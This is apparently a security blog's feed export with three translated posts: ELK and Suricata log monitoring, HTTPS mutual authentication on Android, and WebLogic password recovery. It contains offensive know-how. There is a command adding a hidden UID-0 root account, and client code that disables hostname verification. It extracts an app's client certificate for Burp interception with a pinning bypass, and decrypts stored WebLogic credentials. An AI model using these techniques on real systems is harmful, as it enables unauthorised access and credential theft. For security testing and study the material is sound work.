class="line"> from: user@domain.com</div><div class="line"> smtp:</div><div class="line"> auth: true</div><div class="line"> starttls.enable: false</div><div class="line"> host: mail.domain.com </div><div class="line"> port: 587</div><div class="line"> user: user</div><div class="line"> password: pass</div></pre></td></tr></table></figure></p><p>“event_type”: “alert”,</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div 
class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div></pre></td><td class="code"><pre><div class="line">{</div><div class="line"> "trigger": {</div><div class="line">// fires every 5m</div><div class="line"> "schedule": {</div><div class="line"> "interval": "5m"</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "input": {</div><div class="line">// the query whose results are evaluated</div><div class="line"> "search": {</div><div class="line"> "request": {</div><div class="line"> "search_type": "query_then_fetch",</div><div class="line"> "indices": ["logstash-map-2018.07"],</div><div class="line"> "types": [],</div><div class="line"> "body": {</div><div class="line"> "size": 0,</div><div class="line"> "query": {</div><div class="line"> // bool: both conditions must hold</div><div class="line">"bool" : {</div><div class="line"> "must" : [</div><div class="line"> { "match" : { "event_type": "alert" }},</div><div class="line"> { "range" : { "@timestamp" : { "gte" : "now-1h" }}}</div><div class="line"> ]</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // condition that decides whether the actions run</div><div class="line"> "condition": {</div><div class="line"> "compare": {</div><div class="line"> 
"ctx.payload.hits.total": {</div><div class="line"> "gte": 10</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> // how the alert is delivered</div><div class="line"> "actions": {</div><div class="line"> "my-logging-action": {</div><div class="line"> "logging": {</div><div class="line"> "level": "info",</div><div class="line"> "text": "Found {{ctx.payload.hits.total}} alerts in last 5m."</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>Aggregate the users with failed logins in the last 5 minutes<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div></pre></td><td class="code"><pre><div class="line">GET logstash-dc01-security-2018.08/_search</div><div class="line">{</div><div class="line"> "size": 1,</div><div class="line"> "query": {</div><div class="line"> "bool" : {</div><div class="line"> "must" : [{ "match" : { "event_id" : 4625 }}],</div><div class="line"> 
"filter":[{ "range" : { "@timestamp" : { "gte" : "now-1d" }}}]</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "aggs": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "terms": {</div><div class="line"> "field": "event_data.TargetUserName.keyword"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">Result:</div><div class="line"></div><div class="line">"aggregations": {</div><div class="line"> "group_by_TargetUserName": {</div><div class="line"> "doc_count_error_upper_bound": 0,</div><div class="line"> "sum_other_doc_count": 0,</div><div class="line"> "buckets": [</div><div class="line"> {</div><div class="line"> "doc_count": 6,</div><div class="line"> "key": "test"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 2,</div><div class="line"> "key": "test1"</div><div class="line"> },</div><div class="line"> {</div><div class="line"> "doc_count": 1,</div><div class="line"> "key": "admin"</div><div class="line"> }</div><div class="line"> ]</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>数组<br>ctx.payload.aggregations.group_by_TargetUserName.buckets</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">"condition": {</div><div class="line"> "array_compare": {</div><div class="line"> "ctx.payload.aggregations.group_by_TargetUserName.buckets" : { </div><div class="line"> "path": "doc_count" ,</div><div class="line"> "gte": { </div><div class="line"> "value": 25, </div><div class="line"> 
"quantifier": "some" </div><div class="line"> }</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>Actions</p><p>Send an email</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">"send_email" : {</div><div class="line">"throttle_period": "15m",</div><div class="line"> "email" : {</div><div class="line"> "to" : "<username>@<domainname>", </div><div class="line">"cc": ["a@<domainname>","b@<domainname>"],</div><div class="line"> "subject" : "Watcher Notification", </div><div class="line"> "body" : "Top10 users:\n{{#ctx.payload.aggregations.topn.buckets}}\n{{key}} {{doc_count}}\n{{/ctx.payload.aggregations.topn.buckets}}",</div><div class="line">"attachments" : {</div><div class="line"> "attached_data" : {</div><div class="line"> "data" : {</div><div class="line"> "format" : "json"</div><div class="line"> }</div><div class="line"> }</div><div class="line"> },</div><div class="line"> "priority" : "high"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure><p>webhook</p><h3 id="Suricata"><a href="#Suricata" class="headerlink" title="Suricata"></a>Suricata</h3><p><a href="https://suricata-ids.org/" target="_blank" rel="external">https://suricata-ids.org/</a></p><p>Install</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div 
class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">sudo yum -y install gcc libpcap-devel pcre-devel libyaml-devel file-devel \</div><div class="line"> zlib-devel jansson-devel nss-devel libcap-ng-devel libnet-devel tar make \</div><div class="line"> libnetfilter_queue-devel lua-devel</div><div class="line">wget https://www.openinfosecfoundation.org/download/suricata-4.0.4.tar.gz</div><div class="line">tar -zxvf suricata-4.0.4.tar.gz</div><div class="line">cd suricata-4.0.4</div><div class="line">./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-nfqueue --enable-lua</div><div class="line">make && make install</div><div class="line">make install-full</div></pre></td></tr></table></figure><p>suricata -c /etc/suricata/suricata.yaml -i eth1</p><h4 id="更新规则"><a href="#更新规则" class="headerlink" title="更新规则"></a>Updating rules</h4><p>pip install suricata-update </p><p>Rule sources<br><a href="https://www.openinfosecfoundation.org/rules/index.yaml" target="_blank" rel="external">https://www.openinfosecfoundation.org/rules/index.yaml</a></p><p>et/open: <a href="https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreats.net/open/suricata-%(__version__)s/emerging.rules.tar.gz</a><br>et/pro: <a href="https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz" target="_blank" rel="external">https://rules.emergingthreatspro.com/%(secret-code)s/suricata-%(__version__)s/etpro.rules.tar.gz</a><br>oisf/trafficid: <a href="https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules" target="_blank" rel="external">https://raw.githubusercontent.com/jasonish/suricata-trafficid/master/rules/traffic-id.rules</a><br>ptresearch/attackdetection: <a href="https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz" target="_blank" 
rel="external">https://raw.githubusercontent.com/ptresearch/AttackDetection/master/pt.rules.tar.gz</a><br>scwx/malware: <a href="https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/%(secret-code)s/Suricata_suricata-malware_latest.tgz</a><br>scwx/security: <a href="https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz" target="_blank" rel="external">https://ws.secureworks.com/ti/ruleset/59af35658a44c415/Suricata_suricata-security_latest.tgz</a><br>sslbl/ssl-fp-blacklist: <a href="https://sslbl.abuse.ch/blacklist/sslblacklist.rules" target="_blank" rel="external">https://sslbl.abuse.ch/blacklist/sslblacklist.rules</a></p><h2 id="日志采集"><a href="#日志采集" class="headerlink" title="日志采集"></a>日志采集</h2><h3 id="Syslog"><a href="#Syslog" class="headerlink" title="Syslog"></a>Syslog</h3><p>syslog日志格式</p><p>WAF</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> 
timezone => "Asia/Shanghai"</div><div class="line"> id => "my_plugin_id"</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">filter {</div><div class="line"> # drop waf_log_wafstat</div><div class="line"> if [severity] == 6 {</div><div class="line"> drop { }</div><div class="line"> }</div><div class="line"> # waf log</div><div class="line"> if [severity] == 3 {</div><div class="line"> grok {</div><div class="line"> match => { "message" => "tag:%{DATA:tag}\s*site_id:%{INT:site_id}\s*protect_id:%{INT:protect_id}\s*dst_ip:%{IPORHOST:dst_ip}\s*dst_port:%{INT:dst_port}\s*src_ip:%{IPORHOST:src_ip}\s*src_port:%{INT:src_port}\s*method:%{DATA:method}\s*domain:%{DATA:domain}\s*uri:%{DATA:uri}\s*alertlevel:%{DATA:alert_level}\s*event_type:%{DATA:event_type}\s*stat_time:%{TIMESTAMP_ISO8601:stat_time}\s*policy_id:%{INT:policy_id}\s*rule_id:%{INT:rule_id}\s*action:%{DATA:action}\s*block:%{DATA:block}\s*block_info:%{DATA:block_info}\s*http:%{DATA:http}\s*alertinfo:%{DATA:alertinfo}\s*proxy_info:%{DATA:proxy_info}\s*characters:%{DATA:characters}\s*count_num:%{INT:count_num}\s*protocol_type:%{DATA:protocol_type}\s*wci:%{DATA:wci}\s*wsi:%{DATA:wsi}\s*country:%{DATA:country}"}</div><div class="line"> }</div><div class="line"> mutate {</div><div class="line"> remove_field => ["message"]</div><div class="line"> }</div><div class="line"> }</div><div class="line">}</div><div class="line"></div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200","http://develk02:9200","http://develk03:9200"]</div><div class="line"> user => "elastic"</div><div class="line"> password => "changeme"</div><div class="line"> index => "waf-cs-syslog-217"</div><div class="line"> }</div><div class="line"> stdout { codec => rubydebug }</div><div class="line">}</div></pre></td></tr></table></figure><h4 id="sysmon"><a href="#sysmon" class="headerlink" 
title="sysmon"></a>sysmon</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line">beats {</div><div class="line">port => 5044</div><div class="line">}</div><div class="line">}</div><div class="line">filter{</div><div class="line">mutate { </div><div class="line">split => ["message","\r"]</div><div class="line">remove_field => ["message","beat","@version"]</div><div class="line">lowercase => ["host"] # index must be lower case</div><div class="line">}</div><div class="line">}</div><div class="line"></div><div class="line">"source_name" => "Microsoft-Windows-Security-Auditing"</div><div class="line">"Microsoft-Windows-Sysmon"</div><div class="line"></div><div class="line">output {</div><div class="line"></div><div class="line">elasticsearch {</div><div class="line"> hosts => ["http://develk01:9200"]</div><div class="line"> index => "logstash-%{[host]}-%{+YYYY.MM.dd}"</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>Guide</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p>
<h2 id="架构"><a href="#架构" class="headerlink" title="架构"></a>Architecture</h2><p>Elasticsearch: real-time full-text search and analytics engine<br>Logstash: log collection, parsing and filtering<br>Kibana: graphical presentation of the data</p>
<p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p>
<p>Server (producer) Beats -&gt; Zookeeper Kafka topic -&gt; (ELK clusters split by business function) Logstash (consumer) -&gt; ES -&gt; Kibana (leakage of sensitive information in logs)</p>
<p>Servers<br>/etc/hosts<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">30.3.229.120 develk01</div><div class="line">30.3.229.121 develk02</div><div class="line">30.3.229.122 develk03</div><div class="line">30.3.229.123 devkafka01</div><div class="line">30.3.229.124 devkafka02</div><div class="line">30.3.229.125 devkafka03</div></pre></td></tr></table></figure></p>
<p>Add a root (UID 0) user<br>useradd -u 0 -o -g root -G root -d /root/ user1<br>echo 'user1:passw0rD' | chpasswd</p>
</summary>
</entry>
<entry>
<title>HTTPS One-way and Two-way Authentication</title>
<link href="http://ruos.org/2018/11/02/HTTPS%E5%8D%95%E5%90%91%E5%8F%8C%E5%90%91%E8%AE%A4%E8%AF%81/"/>
<id>http://ruos.org/2018/11/02/HTTPS单向双向认证/</id>
<published>2018-11-02T08:55:06.000Z</published>
<updated>2020-04-29T04:53:52.450Z</updated>
<content type="html"><![CDATA[<ul><li>JKS: Java keystore (certificate store). A JKS holds KeyEntry and CertEntry entries; each entry in the store is identified by its alias.</li><li>P12: short for PKCS12. Likewise a keystore holding a private key, exported from a .jks file; the user installs it on a PC to identify themselves.</li><li>CER: commonly called a digital certificate; it holds the public-key certificate, and anyone may obtain this file.</li><li>BKS: the keystore format specific to the Android platform.</li></ul><p>Converting crt to bks</p><p>Download Bouncy Castle and put the jar into the Java\jdk1.8.0_20\jre\lib\ext directory, or point to it with -providerpath.<br><a href="http://www.bouncycastle.org/latest_releases.html" target="_blank" rel="external">http://www.bouncycastle.org/latest_releases.html</a></p><p>keytool -importcert -v -trustcacerts -alias mykey -file githubcom.crt -keystore keystore.bks -storetype BKS -providerclass org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath bcprov-jdk15on-1.47.jar -storepass testing</p><h1 id="单向认证"><a href="#单向认证" class="headerlink" title="单向认证"></a>One-way authentication</h1><h3 id="SSL-Pinning"><a href="#SSL-Pinning" class="headerlink" title="SSL Pinning"></a>SSL Pinning</h3><p>The client ships with the server's public-key certificate or its fingerprint preinstalled and compares it against the server certificate obtained during the HTTPS request.</p><h1 id="双向验证"><a href="#双向验证" class="headerlink" title="双向验证"></a>Two-way authentication</h1><p>What is two-way authentication? Here is an example.</p><blockquote><p>Bandit: Mushroom, which road are you on? What's your price? (Who are you? Where are you headed?)<br>Yang Zirong: Ha! Whatever you wish for comes: a child who wants milk finds his mother, one who misses his mother's family finds the child's uncle arriving. (Looking for fellow tradesmen)<br>Yang Zirong: My respects, Third Master!<br>Bandit: The Heavenly King subdues the earthly tiger! (How dare you! You come to provoke your ancestors?)<br>Yang Zirong: The pagoda quells the river demon! (If that were so, let me fall to my death from the mountain and drown in the river.)</p></blockquote><p>Put simply: when two strangers do business, after A gives the passphrase, B must answer with the counter-phrase that only A and B know.</p><h3 id="生成证书"><a href="#生成证书" class="headerlink" title="生成证书"></a>Generating certificates</h3><p>1) Generate the client keystore</p><p><code>keytool -genkeypair -alias client -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore client.jks</code></p><p>2) Generate the server keystore</p><p><code>keytool -genkeypair -alias server -keyalg RSA -validity 3650 -keypass 123456 -storepass 123456 -keystore server.keystore</code></p><p>Note: the CN must match the IP address; otherwise the hosts file must be edited</p><p>3) Export the client certificate</p><p><code>keytool -export -alias client -file client.cer -keystore client.jks -storepass 123456</code></p><p>4) Export the server certificate</p><p><code>keytool -export -alias server -file server.cer -keystore server.keystore -storepass 123456</code></p><p>5) 
Certificate exchange</p><p>Import the client certificate into the server keystore, then import the server certificate into the client keystore. A keystore can hold several imported certificates, forming a certificate list.</p><p>Generate the client truststore (a keystore built from the server certificate):<br><code>keytool -import -v -alias server -file server.cer -keystore truststore.jks -storepass 123456</code></p><p>Import the client certificate into the server keystore (so that the server trusts the client certificate):<br><code>keytool -import -v -alias client -file client.cer -keystore server.keystore -storepass 123456</code></p><p>6) Generate BKS keystore files that Android recognizes</p><p>Use Portecle to convert client.jks and truststore.jks to BKS format and place them in the Android client's assets directory.</p><h3 id="配置tomcat"><a href="#配置tomcat" class="headerlink" title="配置tomcat"></a>Configuring Tomcat</h3><p>Edit server.xml to configure port 8443 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><Connector port="8443" protocol="org.apache.coyote.http11.Http11Protocol"</div><div class="line"> maxThreads="150" SSLEnabled="true" scheme="https" secure="true"</div><div class="line"> clientAuth="true" sslProtocol="TLS"</div><div class="line"> keystoreFile="${catalina.base}\conf\server.keystore" keystorePass="123456" </div><div class="line"> truststoreFile="${catalina.base}\conf\server.keystore" truststorePass="123456" /></div></pre></td></tr></table></figure><p>Since the browser has no client certificate, its access is refused.</p><p><img src="https://i.imgur.com/X0cRtx6.png" alt=""></p><h3 id="安卓客户端"><a href="#安卓客户端" class="headerlink" title="安卓客户端"></a>Android client</h3><!-- code --><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div 
class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div></pre></td><td class="code"><pre><div class="line">try {</div><div class="line"> // the client certificate the server will verify, i.e. the client's own keystore</div><div class="line"> KeyStore keyStore = KeyStore.getInstance("BKS");</div><div class="line"> // the server certificate trusted by the client</div><div class="line"> KeyStore trustStore = KeyStore.getInstance("BKS");</div><div class="line"></div><div class="line"> // open the stores</div><div class="line"> InputStream ksIn = getResources().getAssets().open("client.bks");</div><div class="line"> InputStream tsIn = getResources().getAssets().open("truststore.bks");</div><div class="line"></div><div class="line"> // load the stores</div><div class="line"> keyStore.load(ksIn,"123456".toCharArray());</div><div class="line"> trustStore.load(tsIn,"123456".toCharArray());</div><div class="line"> IOUtils.close(ksIn);</div><div class="line"> IOUtils.close(tsIn);</div><div class="line"></div><div class="line"> // initialise the SSLContext</div><div class="line"> SSLContext sslContext = SSLContext.getInstance("TLS");</div><div class="line"> TrustManagerFactory trustManagerFactory = TrustManagerFactory.getInstance("X509");</div><div class="line"> KeyManagerFactory keyManagerFactory = KeyManagerFactory.getInstance("X509");</div><div class="line"> trustManagerFactory.init(trustStore);</div><div class="line"> 
keyManagerFactory.init(keyStore, "123456".toCharArray());</div><div class="line"> sslContext.init(keyManagerFactory.getKeyManagers(), trustManagerFactory.getTrustManagers(), null);</div><div class="line"></div><div class="line"> // set up the connection through HttpsURLConnection</div><div class="line"> SSLSocketFactory socketFactory = sslContext.getSocketFactory();</div><div class="line"> HttpsURLConnection.setDefaultSSLSocketFactory(socketFactory);</div><div class="line"></div><div class="line"> // serverUrl is assumed to hold the HTTPS endpoint string (the original reused the name of the URL being declared, which does not compile)</div><div class="line"> URL url = new URL(serverUrl);</div><div class="line"> HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();</div><div class="line"> // hostname verification: can be left out if the certificate is already installed, otherwise it is needed</div><div class="line"> conn.setHostnameVerifier(new HostnameVerifier() {</div><div class="line"> @Override</div><div class="line"> public boolean verify(String hostname, SSLSession session) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"> });</div><div class="line"> InputStream inputStream = conn.getInputStream();</div><div class="line"> String content = getString(inputStream);</div><div class="line"> IOUtils.close(inputStream);</div><div class="line"> System.out.println(content);</div><div class="line"></div><div class="line">} catch (Exception e) {</div><div class="line"> e.printStackTrace();</div><div class="line">}</div></pre></td></tr></table></figure><h2 id="Burp-代理"><a href="#Burp-代理" class="headerlink" title="Burp 代理"></a>Burp proxy</h2><p>Extract the client certificate from the app and import it in Burp under Project options -> SSL, in the Client SSL Certificates section; Burp can then access the target site directly.</p><p><img src="https://i.imgur.com/CHvcAzX.png" alt=""></p><p>On the app side, the Xposed JustTrustMe module is still used to bypass the server-certificate check.</p>]]></content>
<summary type="html">
<ul>
<li>JKS: a digital certificate store. A JKS holds KeyEntry and CertEntry items, and every entry in the store is identified by its alias.</li>
<li>P12: short for PKCS12. Also a certificate store that holds a private key; it is exported from the .jks file and installed by the user on a PC to identify that user.</li>
</ul>
</summary>
</entry>
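<![CDATA[
Added example, not code from the original post: the Burp step above needs the app's client certificate in a format Burp can import, and Burp's Client SSL Certificates list takes PKCS#12 files. The tool below opens the BKS keystore pulled out of the APK with the BouncyCastle provider and re-exports every private-key entry, together with its certificate chain, into a .p12. Assumptions: a bcprov jar is on the classpath, the key entries are protected with the store password (as in the code above, where keyManagerFactory.init is given the store password), and the class name BksToPkcs12 belongs to this example only.

```java
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.security.Key;
import java.security.KeyStore;
import java.security.Security;
import java.security.cert.Certificate;
import java.util.Enumeration;

import org.bouncycastle.jce.provider.BouncyCastleProvider;

/**
 * Re-packs the private-key entries of an Android BKS keystore into a PKCS#12 file for Burp.
 * Build/run (bcprov jar name is an assumption):
 *   javac -cp bcprov-jdk15on-1.58.jar BksToPkcs12.java
 *   java  -cp bcprov-jdk15on-1.58.jar:. BksToPkcs12 client.bks 123456 client.p12
 */
public class BksToPkcs12 {
    public static void main(String[] args) throws Exception {
        if (args.length != 3) {
            System.err.println("usage: BksToPkcs12 <in.bks> <password> <out.p12>");
            System.exit(1);
        }
        char[] password = args[1].toCharArray();

        // BKS is a BouncyCastle format; the JDK cannot open it without the BC provider
        Security.addProvider(new BouncyCastleProvider());
        KeyStore bks = KeyStore.getInstance("BKS", "BC");
        try (FileInputStream in = new FileInputStream(args[0])) {
            bks.load(in, password);
        }

        // Burp imports client certificates from PKCS#12, so copy each private key plus its chain across
        KeyStore p12 = KeyStore.getInstance("PKCS12");
        p12.load(null, null); // start with an empty store
        int exported = 0;
        for (Enumeration<String> aliases = bks.aliases(); aliases.hasMoreElements();) {
            String alias = aliases.nextElement();
            if (!bks.isKeyEntry(alias)) {
                // Trust anchors (as in truststore.bks) are certificate-only entries; Burp does not need them
                System.out.println("skipping certificate-only entry: " + alias);
                continue;
            }
            Key key = bks.getKey(alias, password); // assumption: key password equals the store password
            Certificate[] chain = bks.getCertificateChain(alias);
            p12.setKeyEntry(alias, key, password, chain);
            System.out.println("exported key entry: " + alias + " (" + chain.length + " certificate(s) in chain)");
            exported++;
        }
        if (exported == 0) {
            throw new IllegalStateException("no private-key entries found; is this the trust store rather than client.bks?");
        }
        try (FileOutputStream out = new FileOutputStream(args[2])) {
            p12.store(out, password);
        }
    }
}
```

Import the resulting client.p12 with the same password in Project options -> SSL -> Client SSL Certificates, with the destination host set to the API host the app talks to. Burp needs nothing from truststore.bks: the reason the app accepts Burp's certificate at all is the JustTrustMe hook mentioned above, not anything in Burp's configuration.
]]>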
<entry>
<title>Password Crack Tips</title>
<link href="http://ruos.org/2018/05/11/Password-Crack-Tips/"/>
<id>http://ruos.org/2018/05/11/Password-Crack-Tips/</id>
<published>2018-05-11T03:05:15.000Z</published>
<updated>2018-05-11T03:19:58.312Z</updated>
<content type="html"><![CDATA[<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>Recovering passwords stored by common software</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol><li>Console login password (boot.properties)</li><li>Data source configuration file (Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li></ol><figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">import weblogic.security.internal.*;</div><div class="line">import weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line">/**</div><div class="line"> * Decrypts a WebLogic encrypted string (for example an {AES}... value) with the domain's own encryption service.</div><div class="line"> * Password file: Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</div><div class="line"> * Key file: Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</div><div class="line"> */</div><div class="line">public class WebLogicDecryptor {</div><div class="line">    private static ClearOrEncryptedService ces;</div><div class="line"></div><div class="line">    public static void main(String[] args) throws Exception {</div><div class="line">        // Both arguments are needed; the original tested for fewer than 1 and then dereferenced args[1]</div><div class="line">        if (args.length < 2) {</div><div class="line">            throw new Exception("must set [domainDir] [encryptStr]");</div><div class="line">        }</div><div class="line">        ces = new ClearOrEncryptedService(</div><div class="line">                SerializedSystemIni.getEncryptionService(args[0])); // your_domain</div><div class="line">        System.out.println("Decrypted: " + ces.decrypt(args[1])); // {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe</div><div class="line">    }</div><div class="line">}</div></pre></td></tr></table></figure><a id="more"></a><ol><li>Set the environment variables<br><code>base_domain\bin\setDomainEnv.cmd</code></li><li>Compile<br><code>javac WebLogicDecryptor.java</code></li><li>Run<br><code>java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=</code></li></ol><p>NetSPI's decryptor does the same without a WebLogic installation; it needs only SerializedSystemIni.dat and BouncyCastle:<br><a href="https://github.com/NetSPI/WebLogicPasswordDecryptor" target="_blank" rel="external">https://github.com/NetSPI/WebLogicPasswordDecryptor</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java</div><div class="line">java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="</div></pre></td></tr></table></figure></p><p>Patch installation<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view</div><div class="line">./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir</div><div class="line">./bsu.sh -install 